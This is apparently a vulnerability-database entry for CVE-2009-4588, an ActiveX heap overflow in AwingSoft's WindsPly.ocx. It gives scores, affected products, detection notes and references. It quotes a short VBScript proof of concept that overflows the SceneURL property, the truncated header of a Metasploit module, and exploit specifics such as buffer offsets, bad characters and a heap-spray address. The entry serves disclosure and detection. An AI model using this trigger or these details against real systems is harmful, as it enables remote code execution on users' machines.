CVE-2009-4588
Published 2010-01-07
Priority: P348 · Severity: critical · CVSS 2.0 base score: 9.3 · Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit available · EPSS: 32.04% (98.1st percentile)
Heap-based buffer overflow in the WindsPlayerIE.View.1 ActiveX control in WindsPly.ocx 3.5.0.0 Beta, 3.0.0.5, and earlier in AwingSoft Awakening Web3D Player and Winds3D Viewer allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long SceneUrl property value, a different vulnerability than CVE-2009-2386. NOTE: some of these details are obtained from third party information.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awingsoft | awakening_winds3d_player | — | — |
| awingsoft | awakening_winds3d_player | — | — |
| awingsoft | awakening_winds3d_viewer | — | — |
| awingsoft | awakening_winds3d_viewer | — | — |
Detection & IOCs (extracted from sources)

bytes: %00%00%01%00

- Detect heap spray pattern: repeated 0x0C0C0C0C return address used in exploit targeting WindsPlayerIE.View.1 ActiveX control
- Monitor for instantiation of the WindsPlayerIE.View.1 ActiveX CLSID/ProgID in browser contexts, especially with long SceneURL property values (offset 8984 bytes triggers overflow)
- Payload bad characters for this exploit are null byte, tab, newline, carriage return, single quote, and backslash: \x00\x09\x0a\x0d'\ ; shellcode in network traffic will avoid these bytes
- PoC uses a buffer of 8704 'A' characters followed by 4 bytes 'bbbb' and escape sequence %00%00%01%00 to trigger the overflow in WindsPly.ocx SceneURL property
- Exploit delivery is via HTML page with JavaScript heap spray; page uses http-equiv and javascript refresh methods to leave the page post-exploitation
- Affected versions of WindsPly.ocx are 3.0.0.5, 3.5.0.0 Beta, and 3.6.0.0 Beta; the Metasploit module targets all Windows XP SP0-SP3 with IE 6.0 SP0-2 and IE 7.0
- The Metasploit module sets EXITFUNC to 'process' and uses a StackAdjustment of -3500; payload space is limited to 1024 bytes
- This is a different vulnerability from CVE-2009-2386, though both affect the same ActiveX control
No detection rules found.
Exploit-DB: AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit) (exploitdb, 2010-04-30)
---
```ruby
##
# $Id: awingsoft_web3d_bof.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# awingsoft_web3d_bof.rb
#
# AwingSoft Web3D Player 'SceneURL()' Buffer Overflow exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Internet Explorer 6, Windows XP SP2
# - Internet Explorer 7, Windows XP SP3
#
# WindsPly.ocx versions tested:
# - 3.0.0.5
# - 3.5.0.0
# - 3.6.0.0 (beta)
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Meta
```
Exploit-DB: AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC) (exploitdb, 2009-07-10)
---
AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
url: http://www.awingsoft.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/
Dedicated to aaannamariaaa :D
This was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.
File: WindsPly.ocx
Ver.:
```vb
buff = String(8704, "A")
mReg = unescape("bbbb")
mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
buf1 = String(88, "c")
buf2 = String(47284, "D")
test.SceneURL = buff + mReg + mExc + buf1 + buf2
```
# milw0rm.com [2009-07-10]
Metasploit: AwingSoft Winds3D Player SceneURL Buffer Overflow
This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.
No writeups or analysis indexed.
References:

- http://secunia.com/advisories/35764
- http://www.exploit-db.com/exploits/9116
- http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51672